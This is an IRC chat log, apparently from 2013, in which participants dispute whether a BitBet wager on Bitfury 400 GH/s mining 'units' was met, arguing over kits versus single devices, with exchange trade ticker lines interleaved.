"We're currently shipping 2 H-cards with starter kit (until we have boards and software that delivers 25GH)" Aug 29 20:33:49 Anduck: not according to mircea_popescu's comments 2 days ago. Aug 29 20:33:51 [HAVELOCK] [AM100] 2 @ 0.02525 = 0.0505 BTC [-] Aug 29 20:34:06 Anduck: sorry, be more carfeful next time when you read the bet statement. Aug 29 20:34:09 i don't see why it wouldn't be as i said. Aug 29 20:34:18 Anduck: because "English" Aug 29 20:34:24 it's only semantics after the real deal: [20:33:31] the "promised performance" means that customers will get the hashing rate they ordered at the energy cost they were told it will eat Aug 29 20:34:36 it's ONLY semantics Aug 29 20:34:37 Anduck: again, thats not what the bet says. I'm very sorry. Aug 29 20:35:00 but that was exact quote from the bet... i'll stop fighting with you now :I Aug 29 20:35:56 well the best i can do for either side atm is to say we'll see how this turns out. Aug 29 20:36:28 mircea_popescu: just a question, how much do the semantics affect the bet outcome? Aug 29 20:36:45 if the _bet_ itself is a clear thing how it should be understood Aug 29 20:36:46 lol Aug 29 20:36:51 [HAVELOCK] [AM100] 25 @ 0.02522 = 0.6305 BTC [-] Aug 29 20:36:55 Are you asking if words matter? Aug 29 20:36:55 Anduck: Which means there needs to be a 400Gh unit delivered that provides 400Gh in a single 'DEVICE', or 'UNIT' as per language in the bet.... punin has stated that they are shipping additional hardware "(until we have boards and software that delivers 25GH)" --- 16H-cards less then 25Gh means they failed to produce a 400Gh unit Aug 29 20:37:15 kleeck: i am asking that is the actual wording/semantics more important than the bet itself Aug 29 20:37:25 Don't the words comprise the bet? Aug 29 20:37:34 Anduck: yes. What the bet actaully SAYS matters more then statement -- I specifically came in here 2 days ago to ask mircea_popescu specifics about this Aug 29 20:37:53 kleeck: if one thinks that unit/device is not a kit (in this bet) Aug 29 20:37:57 err, the statement i mean Aug 29 20:38:17 Anduck: The word 'KIT' is totally non-existant in the bet languge Aug 29 20:38:19 the statement is absolotely clear in my eyes, except there should've been better words Aug 29 20:38:36 all the units and devices shouldve been "kit" so there wouldn't be this semantics mess Aug 29 20:38:43 lol. i guess this is how a good bet works, it's totally clear to everyone except it doesn't match. Aug 29 20:38:46 [MPEX] [S.MPOE] 6249 @ 0.0008708 = 5.4416 BTC [-] Aug 29 20:38:50 [MPEX] [S.MPOE] 9972 @ 0.00087071 = 8.6827 BTC [-] Aug 29 20:38:52 [MPEX] [S.MPOE] 10600 @ 0.00087063 = 9.2287 BTC [-] Aug 29 20:39:00 fractal: but everyone knows that a device or unit means a kit since they only sold kits Aug 29 20:39:04 they didnt sell units or devices Aug 29 20:39:05 only kits Aug 29 20:39:16 so i think it's perfectly clear we're talking about kits when we talk about units Aug 29 20:39:23 Anduck: Thats not true... Aug 29 20:39:25 In my experience, the wording is always important. It frames the expectation of any given interaction. Aug 29 20:39:31 but it is, fractal. they sell KITS Aug 29 20:40:00 Anduck: You are spreading misinformation... there is a specific 400Ghash miner -- look at this picture. http://imageshack.us/a/img407/6741/1bzj.png Aug 29 20:40:02 [BTCTC] [LTC-ATF.B2] 2 @ 0.01043 = 0.0209 BTC [+] Aug 29 20:40:29 I dont know how I can be any more clear that this is a single device --- Notice how it is a 'box' that has '400Ghash miner' written on it with white letters? http://imageshack.us/a/img407/6741/1bzj.png Aug 29 20:40:30 kleeck there's always going to be some edge. natural language is what it is. Aug 29 20:40:50 fractal: that case is not part of the bet nor is that case in the bfsb.com shop Aug 29 20:40:50 Anduck: please let me know if you have trouble loading this image, i can mirror it for you somehwere else Aug 29 20:40:52 or ever was Aug 29 20:40:58 Yes. The "edge" is in clearly communicating. :) Aug 29 20:41:05 [HAVELOCK] [AM100] 50 @ 0.0250001 = 1.25 BTC [-] Aug 29 20:41:07 that picture is not bfsb.com product. the customer made it himself Aug 29 20:41:18 i mean, the case in that picture* Aug 29 20:41:27 "clearly communicating" is not something of reality sadly. Aug 29 20:41:34 Anduck: http://imageshack.us/a/img11/6249/krlv.png Aug 29 20:41:41 [BTCTC] [BITVPS] 90 @ 0.00224 = 0.2016 BTC [-] Aug 29 20:41:42 [BTCTC] [BITVPS] 210 @ 0.00222 = 0.4662 BTC [-] Aug 29 20:41:50 fractal: as i said, that case is not a bfsb product Aug 29 20:41:53 it's customer made Aug 29 20:42:06 Anduck, i'm not done posting picture.... http://imageshack.us/a/img11/6249/krlv.png see inside the case? the M-board. it only fits 16 cards. Aug 29 20:42:09 fractal: http://www.bitfurystrikesback.com/shop/ Aug 29 20:42:14 they dont sell units or devices, they sell kits Aug 29 20:42:27 who says a kit can't include 2 m-boards? Aug 29 20:42:42 Anduck: The language on the bet says it can't. Aug 29 20:42:57 I disagree mircea_popescu. I understand that there are situations, like this one, but there are ways of being more clear and less clear. Therefore clearity exists even if on a spectrum.. Aug 29 20:43:00 i think the statement is more importnat Aug 29 20:43:11 (Sorry to derail!) Aug 29 20:43:19 kleeck: what do you think, what's clearer way to understand the statement of the bet? Aug 29 20:43:33 kleeck the problem is that you only have clear communication in retrospect. Aug 29 20:43:37 Anduck: I came in here specifically to ask mircea_popescu and he said that a 400Gh 'UNIT' must exist --- based on the math, it can't Aug 29 20:43:46 otherwise any statement can be elongated ad infinitum with requests for definitions Aug 29 20:43:49 fractal: it can.. and based on math it does Aug 29 20:43:55 as all words are ultimately circular constructs. Aug 29 20:43:55 I haven't read it yet. I will if you want. I was chiming in more to the point of "do semantics matter" - I'll read the bet. Aug 29 20:43:55 Anduck: no, it doesn't. Aug 29 20:44:13 i have 3 h-boards.. they eat 54 watts from the wall Aug 29 20:44:18 and give 68 ghash Aug 29 20:44:23 Anduck: Shipping additonal hardware because the company missed spec does not mean that there is a 400Gh UNIT Aug 29 20:44:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.02589 = 0.0518 BTC [+] Aug 29 20:44:38 fractal: they sell kits, not units Aug 29 20:44:42 they ship what they promised Aug 29 20:44:51 Anduck: Thats not what the bet language says Aug 29 20:44:52 they just said that the kit will include more h-boards than it was meant to Aug 29 20:44:56 [BTCTC] [BMF] 1 @ 0.0398 BTC [-] Aug 29 20:45:04 that doesn't mean it doesn't meet the performance promise of the kit/unit Aug 29 20:45:06 Anduck: Sorry, again, thats not what the bet language says Aug 29 20:45:16 but that is the statement, isn't it?? Aug 29 20:45:27 Is the debate around the phrase, "mining units"? Aug 29 20:45:33 yeah Aug 29 20:45:38 bfsb only sold kits Aug 29 20:45:44 so i think unit should be understood as kit Aug 29 20:45:53 customers were promised 25gh or 400gh miners Aug 29 20:46:00 which would use 40W or 400W or less Aug 29 20:46:14 and the customers are getting delivered those performances Aug 29 20:46:48 So, they are getting kits instead of completed devices and those devices are meeting spec? Aug 29 20:46:59 Anduck: 68 /3 = 22.... 22*16 = 352Gh maximum in a single 'Miner', or selft contained 'unit' or 'kit..... This does not exist because the manufactuere missed performance specs.... The bet says nothing of customer relations by refunding or sending more hardware Aug 29 20:47:14 [BTCTC] [BITVPS] 307 @ 0.002848 = 0.8743 BTC [+] Aug 29 20:47:14 [BTCTC] [BITVPS] 43 @ 0.002849 = 0.1225 BTC [+] Aug 29 20:47:22 no need for 16 h-boards in the 400gh kit Aug 29 20:47:46 Anduck: I only placed a NO bet because I didn't belive they'd hit 400Gh in a single unit. BFL missed, and others. The bet says that there should be a 400Gh unit shipped, and it should be under 400W.... it might be under 400W, but its not 400Gh Aug 29 20:47:49 there can be (and will be) enough h-boards so the 400gh kit does 400 ghash Aug 29 20:47:57 [BTCTC] [TAT.VIRTUALMINE] 82 @ 0.000803 = 0.0658 BTC [-] Aug 29 20:48:07 Are the assembled kits meeting spec once made into a mining unit? Aug 29 20:48:13 Anduck: not on a single unit -- as the language says in the bet Aug 29 20:48:21 Anduck: thats not what the bet language says. Aug 29 20:48:34 kleeck: yes. a starter kit includes 2 h-boards and 400gh kit includes 18 or 19 h-boards Aug 29 20:48:39 Anduck: you can't make a vague bet, and then claim 'semantics' when you lose Aug 29 20:48:46 Anduck: I came in here specifically to ask mircea_popescu and he said that a 400Gh 'UNIT' must exist --- based on the math, it can't <<< which snippet is this ? Aug 29 20:49:22 I don't understand the debate over kit, unit, whateverthefuck. Does the 'thing' do 400GH/s @ 400W or not? Aug 29 20:49:29 this ? Aug 29 20:49:29 Isn't that the question? Aug 29 20:49:29 Aug 27 17:25:45 what if they ship 2 units to make up for lower hashrates? Aug 29 20:49:29 Aug 27 17:25:58 is the bet yes or no? Aug 29 20:49:29 Aug 27 17:26:54 (25 GH/s unit 40W, 400 GH/s unit 400W) Aug 29 20:49:29 Aug 27 17:28:25 fractal seems pretty clear cut neh ? Aug 29 20:49:29 Aug 27 17:28:43 mircea_popescu: just double checking. Aug 29 20:49:44 mircea_popescu: yeah thats it... Aug 29 20:49:44 TomServo, no, that isn't the question. Aug 29 20:49:51 400Gh 'UNIT' --- UNIT people --- Aug 29 20:49:52 and as customers weren't sold specifically 1 or 16 h-boards, the kits can include any amount of those.. the kits must meet the promised performance and they seem to do so Aug 29 20:50:03 ;ud unit Aug 29 20:50:07 [BTCTC] [PETA-MINE] 1 @ 0.65 BTC Aug 29 20:50:09 im so bad at irc Aug 29 20:50:12 a mining unit, 400 gh mining unit, is built from several h-boards and m-boards Aug 29 20:50:18 ;;define unit Aug 29 20:50:19 Error: "define" is not a valid command. Aug 29 20:50:22 Anduck: well I only placed a no bet based on the language of a UNIT being a self-containted device that is attached.... Aug 29 20:50:22 awell Aug 29 20:50:36 we certainly can't google this... Aug 29 20:50:39 fractal: then you tried to work the semantics against the statement of the bet or what? Aug 29 20:50:50 fractal in fairness, the "self contained device" part is also not in the bet text. Aug 29 20:51:07 kleeck bitbet is a fascinating exercise in the limits of communication. Aug 29 20:51:34 the statement is super clear in my eyes, really. people get what they ordered. people get the hashrate at the watts they were promised. the performance requirement (which the bet was about) IS met. Aug 29 20:51:35 mircea_popescu: right.... but in fairness, the bet doesn't say that the manufactuere can miss hashrate performance on a single 25Gh board, and ship more to make up for it! Aug 29 20:51:36 mircea_popescu, I rather enjoy what is coming of it. Aug 29 20:51:46 [BTCTC] [LABCOIN] 1 @ 0.003654 BTC [-] Aug 29 20:51:50 human language is not meaningful unless the receptor supplies context to make it meaningful. the contexts receptors supply often vary. Aug 29 20:52:03 the attempt to make the context entirely explicit is burdensome and provably doomed. Aug 29 20:52:12 fractal right. Aug 29 20:52:19 hence my "o, this is going to be one of those". Aug 29 20:52:20 Anduck: The performance requirement was *not* met. No single H-card operates at 25Gh! Aug 29 20:52:21 fractal: the 25gh unit is a 25gh kit as sold for customers, doesn't say it must include 1 h-board. Aug 29 20:52:36 Anduck: Sorry, the language doesn't say 'KIT' Aug 29 20:52:37 but the UNIT does!!! Aug 29 20:53:20 fractal also why i asked you if it's your first time and advised you go small. these things do happen. Aug 29 20:53:31 the -performance- promised to customers is met. customers get exactly the performance they ordered. Aug 29 20:53:50 Anduck: Again, the language of the bet doesn't match up with the fact that performance was missed on the 25Gh board,,, the fact that they got more or were satisfied is irrelevant Aug 29 20:53:51 [BTCTC] [DMS.MINING] 20 @ 0.003499 = 0.07 BTC [+] Aug 29 20:54:01 Yes. What I'm seeing is the classic, "Oh come on, we all knew the intended bet!" Which isn't a sound defense. The debate must center around the words used to describe the bet. If the product is a "mining unit" and meets the spec in the bet, then Anduck is correct, else fractal is correct. Aug 29 20:54:23 a mining unit is a mining kit, isn't it? Aug 29 20:54:40 kleeck: Just like BFL shipped out multiple units to compensate, that is what punin is doing. Aug 29 20:54:42 [BTCTC] [LABCOIN] 217 @ 0.003654 = 0.7929 BTC [-] Aug 29 20:54:43 [BTCTC] [LABCOIN] 217 @ 0.003656 = 0.7934 BTC [+] Aug 29 20:54:45 kleeck: If it's multiple mining units, then Anduck is not correct.. Aug 29 20:54:45 [BTCTC] [LABCOIN] 333 @ 0.003659 = 1.2184 BTC [+] Aug 29 20:54:46 [BTCTC] [LABCOIN] 1000 @ 0.00366 = 3.66 BTC [+] Aug 29 20:54:47 [BTCTC] [LABCOIN] 3000 @ 0.003674 = 11.022 BTC [+] Aug 29 20:54:48 [BTCTC] [LABCOIN] 2999 @ 0.003675 = 11.0213 BTC [+] Aug 29 20:54:48 there was and never could've been a single card producing 400 ghash, it was sold as a "h-cards enough to make 400 ghash unit". RIGHT? Aug 29 20:55:07 The Honorable Judge Kleeck Presiding! Aug 29 20:55:10 [BTCTC] [DMS.PURCHASE] 50 @ 0.01594 = 0.797 BTC [-] Aug 29 20:55:15 Bring forth your evidence! Aug 29 20:55:21 customers ordered 400 gh mining kits.. and they got what were promised Aug 29 20:55:30 fractal bfl didn't actually ship tho, Aug 29 20:55:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.02588 = 0.0518 BTC [-] Aug 29 20:55:35 it wasn't the case they shipped MORe units. Aug 29 20:55:36 Anduck: No, its not. The bet says nothing of a KIT. it says a mining unit. Somehing that is a single prodcut attacted..... 2 seperate products adding up to more then 400Gh mean that the manufacturer missed performance spec for that unit Aug 29 20:55:37 "RIMSHOT!" Aug 29 20:55:37 well the customers were promised 400 gh miner............. Aug 29 20:55:57 Anduck: Thats not what the bet says Aug 29 20:56:05 well the bet is about performance, not the amount of h-boards used to produce the performance of the unit Aug 29 20:56:28 There are multiple clauses in the bet that must be true for it to be "YES". Aug 29 20:56:42 yes Aug 29 20:56:53 they must be delivered this month Aug 29 20:57:06 and? Aug 29 20:57:15 bfsb kits must be delivered this month.. .and Aug 29 20:57:27 Anduck: If the bet language said "If punin can't make a 400Gh single device, he's allow to ship as much hardware as he wan'ts, and we'll just consider it a 'KIT' "" --- if it said that, there's no way in my right mind i would have bet NO... it would be an impossible bet to win Aug 29 20:57:34 they must meet the advertised performance (25gh @ 40W and 400gh @ 400W) Aug 29 20:57:39 [BTCTC] [BITVPS] 4 @ 0.0023 = 0.0092 BTC [-] Aug 29 20:57:45 and 5 deliveres of bfsb kits must be confirmed Aug 29 20:57:46 you removed the word UNIT didn't you??? very sneaky! Aug 29 20:57:46 and they have to be a "mining unit" and they have to hash at the given rates and draw at the given powers. Aug 29 20:57:46 fractal why'd it have impossible to win ? Aug 29 20:58:18 [BTCTC] [LABCOIN] 1 @ 0.003675 BTC [+] Aug 29 20:58:29 mircea_popescu: becaucause he could ship as much hardware to make up for it -- provided the power usage was low enough.... but I placed the bet based on Power usage AND hashrate in a single self-contained UNIT Aug 29 20:58:37 fractal: he's allowed to ship as much h-boards and m-boards needed to get the performance. it wouldn't break the bet.... if they would eat more watts than promised, that would be a bet-breaker Aug 29 20:58:37 UNIT Aug 29 20:58:51 Anduck: Not according to the language though... Aug 29 20:58:52 fractal: yeah i did, can be unit or miner or kit Aug 29 20:59:12 we're talking about kits as units anyway since they never sold single units. they're KITS Aug 29 20:59:12 fractal well ya but it wouldn't be economically feasible to do so Aug 29 20:59:16 he can't like, ship gpus Aug 29 20:59:20 indeed Aug 29 20:59:26 the performance must be met. and it is met Aug 29 20:59:36 Anduck: I dont see any mention of KIT on there. And If i read the language the performance is not met in a device. Aug 29 20:59:42 if he shipped GPU's, the performance (400 gh @ 400 watts) wouldn't be met Aug 29 20:59:44 [BTCTC] [BASIC-MINING] 1 @ 0.192 BTC [-] Aug 29 20:59:47 Anduck: No its not met.. punin admits they are under-hashing Aug 29 20:59:49 the unit is the same thing as a kit Aug 29 21:00:04 it's clear because it says 25gh unit and 400 gh unit Aug 29 21:00:11 Anduck: No, 400Gh unit is a single device, not multiple devices. Aug 29 21:00:22 it's very clear it means the promised miner ( a kit or a unit) Aug 29 21:00:33 UNIT.... not 'oh we ship as much hardware to make up for it if the manufacturer misses specs' Aug 29 21:00:42 Anduck: actaully, its not clear at all Aug 29 21:00:59 fractal: they can ship as much h-boards as they want but the PERFORMANCE must be met Aug 29 21:01:15 the promised performance of the customer-bought kits must be met¨ Aug 29 21:01:23 or units, anything you want to call it Aug 29 21:01:25 Anduck: not according to the language of the bet. Aug 29 21:01:33 anyway, for the lovers of history, here's a recent previous dispute http://log.bitcoin-assets.com/?date=03-08-2013&display=show#202828 Aug 29 21:01:49 Oooh. precedent! Aug 29 21:01:50 http://www.bitfurystrikesback.com/product/400gh-miner-october-2013/ Aug 29 21:01:58 [BTCTC] [BASIC-MINING] 3 @ 0.1936 = 0.5808 BTC [+] Aug 29 21:02:12 From the website " What’s included: 1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Aug 29 21:02:14 kleeck there's also a very lulzy one on the forum and here from back in march. some guy named rikur and some other guy Aug 29 21:02:17 thats what was advertised Aug 29 21:02:23 but that was hardly bringhing any solid points Aug 29 21:02:46 fractal: the bet was about promised performance, not about promised hardware Aug 29 21:02:48 [BTCTC] [LABCOIN] 388 @ 0.00375 = 1.455 BTC [+] Aug 29 21:02:50 [BTCTC] [LABCOIN] 194 @ 0.003751 = 0.7277 BTC [+] Aug 29 21:02:51 Does bitbet need an arbiter of justice? I'd love that role... also the title. Aug 29 21:02:51 [BTCTC] [LABCOIN] 418 @ 0.003755 = 1.5696 BTC [+] Aug 29 21:03:14 Anduck: Thats not what the English on the bet says. It says the 400 Gh 'UNIT' Aug 29 21:03:14 mircea_popescu: that log you linked is about the s.dice vs s.mpoe bet? Aug 29 21:03:18 yea Aug 29 21:03:22 UNIT. as in what was advertised -- From the website " What’s included: 1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Aug 29 21:03:30 They weren't able to deliver this Aug 29 21:03:32 that is a fact. Aug 29 21:03:34 mircea_popescu: when s.dice dropped out of MPEX, the value was considered zero? Aug 29 21:03:56 fractal: they didn't deliver the promised hardware, yes. but they delivered the promised performance of the units Aug 29 21:04:05 the units that were sold, they were 25gh unit and 400gh unit Aug 29 21:04:18 Anduck: No, they didn't the units don't hit 400Gh as advertised -- Aug 29 21:04:33 They have to ship additional hardware SPECIFICALLY Because they missed advertised specs Aug 29 21:04:48 I hope you can understand this Aug 29 21:04:50 they missed specs of the h-board but not the kit/unit/miner Aug 29 21:04:52 Anduck iirc it weas like "bbet mkt cap on mpex will exceed sdice mkt cap" Aug 29 21:05:04 Anduck: and the 400Gh miner includes 16 H-bords -- AS ADVERTISED Aug 29 21:05:25 well mircea_popescu.. wasn't that kinda clear? if there's no cap of s.dice at mpex, it's same as zero cap Aug 29 21:05:35 Anduck: for the bet to be yes, "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" has to exist -- and it doesn't Aug 29 21:05:48 fractal: wasn't about advertised hardware... it was about the performance Aug 29 21:05:58 and the performance is absolutely met Aug 29 21:05:59 Anduck no argument, it is clear. was just giving exampel of previous contentions Aug 29 21:06:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.0259 BTC [+] Aug 29 21:06:05 Anduck: It missed performance. It's not 400Gh Aug 29 21:06:11 Anduck: No, performance is not met. Aug 29 21:06:27 [BTCTC] [TAT.ASICMINER] 31 @ 0.0262 = 0.8122 BTC [+] Aug 29 21:06:33 Anduck: thats why they're shipping additional hardware. Why would they send more hardware then promised if performance is met? They woudln't. Aug 29 21:06:44 Anduck: they are shipping additional hardware because performance was NOT met Aug 29 21:07:04 Again, 1 unit was advertised as "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Aug 29 21:07:14 the performance is met.. performance of the unit: hashrate @ power usage Aug 29 21:07:32 the units that customers get do have the performance of 25gh at 40 watts max Aug 29 21:07:42 OR 400gh at 400 watts max Aug 29 21:08:00 Anduck: No, performance is not met. The 400Gh miner does not perform 400Gh. Aug 29 21:08:14 A miner is as advertised ""1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips"" Aug 29 21:08:15 and as the 400 gh units are built from same h-boards as 25 gh units, it's clear that 400 gh @ 400 watt performance is met like the 25gh @ 40W is met Aug 29 21:08:33 the 400gh miner performs 400 gh at the promised watts. Aug 29 21:08:43 I think there's only one solution to this. Duel to the death! Aug 29 21:08:47 atleast my 68 ghash at 53 W _from the wall_ Aug 29 21:08:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.0262 BTC [+] Aug 29 21:08:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.0263 BTC [+] Aug 29 21:08:50 [BTCTC] [TAT.ASICMINER] 8 @ 0.02639 = 0.2111 BTC [+] Aug 29 21:08:56 but it uses 3.5 boards instead of 4.26 boards Anduck GAH! Aug 29 21:09:01 Anduck: That is not what was advertised. What was advertised was not met. 400Gh was not achived with the hardware, so they had to re-imburse customers at their own expense --- I knew they would miss these targets, which is why i bet NO Aug 29 21:09:01 get with the program Aug 29 21:09:25 and 3 h-boards.. each h-board using 18 watts Aug 29 21:09:35 how many watts is it going to take to do 400gh with said device? Aug 29 21:09:44 why are they underhashing anyway ? any word from manufacturer ? Aug 29 21:09:56 jborkl: There is no 400Gh device.... Aug 29 21:09:59 if bfsb shipped 20 h-boards for the 400gh unit, it would draw only 360 watts. and it'd provide 400gh Aug 29 21:10:01 jborkl if we liniarly extrapolate about 350ish Aug 29 21:10:23 [BTCTC] [DMS.PURCHASE] 1 @ 0.01594 BTC [-] Aug 29 21:10:24 mircea_popescu: theyre underhashing most likely due to the quality of the fab and software Aug 29 21:10:27 Anduck: they can't fit 20h-boards on a 400gh unit..... a 400gh unit can fix 16h-cards maximum.... hence UNIT Aug 29 21:10:29 and they are going to provie customers with 400 gh as promised for the 350w draw? Aug 29 21:10:40 Anduck but nothing definite ? Aug 29 21:10:40 the performance of the h-boards itself will be most likely fixed by software, still Aug 29 21:11:05 jborkl: yes, but thats not what the language of the bet said. Aug 29 21:11:13 they bet is a yes then Aug 29 21:11:14 mircea_popescu: it doesn't really matter since the customers get what they were promised. and in the future they might be able to turn their miners for even powerful miners with software update Aug 29 21:11:25 jborkl that's the stated intention. nobody has yet come forward having received a 400gh order Aug 29 21:11:28 afaik at least. Aug 29 21:11:32 Anduck: No, punin said they need to change hardware and it will be done on the next batch -- but not before september 1 Aug 29 21:11:35 power is less than 400 and hash rate is at least 400 Aug 29 21:11:43 Anduck just curious is all. Aug 29 21:11:47 jborkl: No, not in a single device Aug 29 21:11:48 mircea_popescu: will there be needed a 400 gh unit delivered? Aug 29 21:12:16 Anduck what do you mean by "unit" :p Aug 29 21:12:18 fractal: yeah but it still can be -possibly- fixed with sw. Aug 29 21:12:25 so, nobody actually ordered 400gh unit? Aug 29 21:12:25 mircea_popescu: the thing bfsb sold Aug 29 21:12:29 Anduck: if i recall logs correctly, mircea_popescu stated a 400gh device would have to be proven.... i'll have to check logs again tho. Aug 29 21:12:30 25gh unit and 400 gh unit Aug 29 21:12:36 the word "units" in the bet is irrevelvant Aug 29 21:12:38 or they did order and got 2 boxes instead? Aug 29 21:12:53 for the same price? Aug 29 21:12:56 since unit is not defined Aug 29 21:12:59 [BTCTC] [ACTIVEMINING] 950 @ 0.0052 = 4.94 BTC [+] Aug 29 21:13:02 jborkl: Its not irrelvant since its in the bet.... UNIT means a single device Aug 29 21:13:02 fractal: i don't see why.. the performance is met and it can be proven from the hashrate@power usage of the smaller hashrate miners Aug 29 21:13:23 jborkl: a 400Gh was advertised as "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips"" -- this will not be shipped Aug 29 21:13:57 it says int he bet 'AS ADVERTISED' Aug 29 21:14:12 jurov: people ordered 25gh unit (was meant to be 1 h-board + 1 m-board) but they were delivered 1 m-board and 2 h-boards instead.. for the same price. that was because the performance of the single h-board didn't meet the 25ghash -> they had to add another 25gh board in the kit) Aug 29 21:14:20 in retrospect i think this is absolutely the first time a genuine wording problem has come to fore. the previous one (on the bfl specs) was thoroughly manufactured by dishonest blf. Aug 29 21:14:34 advertised performance, not size or space taken up as i see it Aug 29 21:15:02 indeed Aug 29 21:15:07 nor the hardware Aug 29 21:15:10 I went to bitfurystrikesback.com and looked at what was advertised -- I thought, no way they'll get 400Gh on that M-board with 16 cards -- they might hit power -- but I don't think they'll get 400Gh out of that --- I put my money where my mouth is, and I was right-- Aug 29 21:15:20 again, this is only as advertised Aug 29 21:15:20 it's only about the advertised performance, 400 ghash miner for 400 warrs Aug 29 21:15:21 watts* Aug 29 21:15:22 http://imgur.com/npay8GA Aug 29 21:15:25 imgur: the simple image sharer Aug 29 21:15:41 lol Aug 29 21:15:53 .bait Aug 29 21:15:58 hahah Aug 29 21:15:59 http://24.media.tumblr.com/tumblr_mdiv61SY3E1qksua0o1_500.jpg Aug 29 21:16:06 http://thegenesisblock.com/bitfury-400-ghs-bitcoin-mining-rig-hits-us-shores/ interprets it so that "the miner gives only 380GH/s" Aug 29 21:16:09 Bitfury 400 GH/s Bitcoin Mining Rig Hits US Shores - The Genesis Block Aug 29 21:17:21 "Full kits include a main board, 16 hashing boards, a raspberry pi, and cables to set up the miner." Aug 29 21:17:23 Network passed 600TH Aug 29 21:17:23 jurov: the units/kits will be hashing the promised hashrate Aug 29 21:17:37 jurov: " Bitfury 400 GH/s Miner – currently hashing at 380 GH/s on 16 cards. " -- thats correct -- punin admitted it missed hashrate specs -- they will fix it in next manufacturing batch, but its impossible to do that and ship by sept 1--- Aug 29 21:18:04 but they aren't 400gh yet Aug 29 21:18:16 jurov: full kits include more h-boards because of the performance problems with h-boards. but the unit of 400ghash is 400ghash, dependless of the amount of h-boards in the unit/kit/miner Aug 29 21:18:39 jurov: Anduck's argument is that if they send more hardware for free then it counts as being part of the same device Aug 29 21:18:42 the bet was about the advertised performance, that be 400gh unit will produce 400gh and it will do it for less than the 400 watts Aug 29 21:19:05 Anduck: That's not what the language in the bet says though.... seriously... I'm sorry you weren't more specific Aug 29 21:19:07 so, are the kits with multiple h-boards actually sold? Aug 29 21:19:21 the bet wasn't about the amount of hardware delivered... it was about the kits/units and thheir performance Aug 29 21:19:21 jurov: No kit with multiple H-board was ever sold Aug 29 21:19:29 jurov: yeah Aug 29 21:19:35 i mean Aug 29 21:19:41 jurov: http://www.bitfurystrikesback.com/product/400gh-miner-october-2013/ Aug 29 21:19:46 400 gh kit includes enough h-boards to make 400 gh miner Aug 29 21:19:47 they are sold with 1 M-board Aug 29 21:19:57 Anduck: Thats not what was advertised Aug 29 21:20:01 anyway, fractal, since you're new : are you familiar with how you can cancel out bitbet bets ? Aug 29 21:20:05 fractal: they didn't meet the advertised hardware amount. but they meet the advertised performance by far!! Aug 29 21:20:06 if anyone ordered that, he will receive 1 board or more? Aug 29 21:20:17 [BTCTC] [TAT.MINIGAME] 40 @ 0.0002228 = 0.0089 BTC [-] Aug 29 21:20:19 [HAVELOCK] [XBOND] 50 @ 0.00111192 = 0.0556 BTC [-] Aug 29 21:20:29 Anduck: A 400Gh unit with "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" was advertised Aug 29 21:20:37 [HAVELOCK] [XBOND] 700 @ 0.00111192 = 0.7783 BTC [-] Aug 29 21:20:40 mircea_popescu: no, i'm not..... can both sides agree to cancel the bet? Aug 29 21:20:43 mpoe-pr "lol yknow eventually there's gonna bet a channel dedicated to debating bitbet wording" Aug 29 21:20:53 lemme see if i manage to dig up this Aug 29 21:21:10 #bitbetwars Aug 29 21:21:10 i think if they don't ship more boards as a kit to fullfill the 400gh, then it's clearly false Aug 29 21:21:22 the bet. i mean Aug 29 21:21:41 [BTCTC] [TAT.MINIGAME] 67 @ 0.0002218 = 0.0149 BTC [-] Aug 29 21:21:56 [HAVELOCK] [AM100] 1 @ 0.02531 BTC [+] Aug 29 21:22:23 [BTCTC] [LABCOIN] 1 @ 0.003676 BTC [-] Aug 29 21:22:24 fractal: that was the advertised hardware... the bet wasn't about advertised hardware. it was about advertised performance. 400gh for 400 watts. people ordered a kit which produces that and they get what they ordered Aug 29 21:22:43 [HAVELOCK] [AM100] 11 @ 0.02579 = 0.2837 BTC [+] Aug 29 21:22:44 Anduck: Thats not what the bet says Aug 29 21:23:04 [BTCTC] [ACTIVEMINING] 35 @ 0.005049 = 0.1767 BTC [-] Aug 29 21:23:19 Anduck: The best doesn't say 'If the 400Gh miner only mines at 380Gh' they can ship more hardware and its a yes Aug 29 21:23:25 Anduck: if you bought 400gh for some amount of money and then you'd found out you have to buy more hardware to get 400gh Aug 29 21:23:39 then it would *not* meet expected perf Aug 29 21:23:40 [HAVELOCK] [AM100] 19 @ 0.0258 = 0.4902 BTC [+] Aug 29 21:23:41 for you Aug 29 21:23:43 jurov: you don't.. Aug 29 21:23:51 jurov: you pay for the 400 gh and you get the 400 gh Aug 29 21:24:02 jurov: they are shipping 400gh that draws 350w Aug 29 21:24:10 jurov: they're compensating. and thats great... But the bet doesn't say that Aug 29 21:24:14 [HAVELOCK] [AM100] 2 @ 0.025801 = 0.0516 BTC [+] Aug 29 21:24:15 so I see it as a yes Aug 29 21:24:23 but I don't get a vote Aug 29 21:24:25 jurov: there needs to be a 400Gh UNIT -- which doesn't exist Aug 29 21:24:26 everyone gets the hashrate they paid for. and the hashrate will be made within the power usage promised Aug 29 21:24:41 Anduck: that's irrelevant to the bet language Aug 29 21:24:42 so you will get one box with two mainboards for original price? Aug 29 21:24:47 jurov: yes Aug 29 21:24:56 the mining kit promised performance is met Aug 29 21:25:24 [BTCTC] [ACTIVEMINING] 1 @ 0.005049 BTC [-] Aug 29 21:25:25 doesn't matter how many m-boards or h-boards are needed for the performance of the mining unit Aug 29 21:25:27 or kit Aug 29 21:25:29 then that's an unit, imho... but as nothing such was actually delivered, it's undecidable Aug 29 21:25:31 or whatever you want to call it Aug 29 21:25:35 jurov: thats just good customer support -- but doesn't make the fact that the 400Gh miner isn't 400Gh any different --- and thats what the bet language is about Aug 29 21:25:39 [BTCTC] [ACTIVEMINING] 50 @ 0.004808 = 0.2404 BTC [-] Aug 29 21:26:11 [BTCTC] [ACTIVEMINING] 1 @ 0.004611 BTC [-] Aug 29 21:26:35 Anduck: to be honest -- i'd rather cancel the bet then have a long forum discussion that takes hours of debate over the next few days -- if 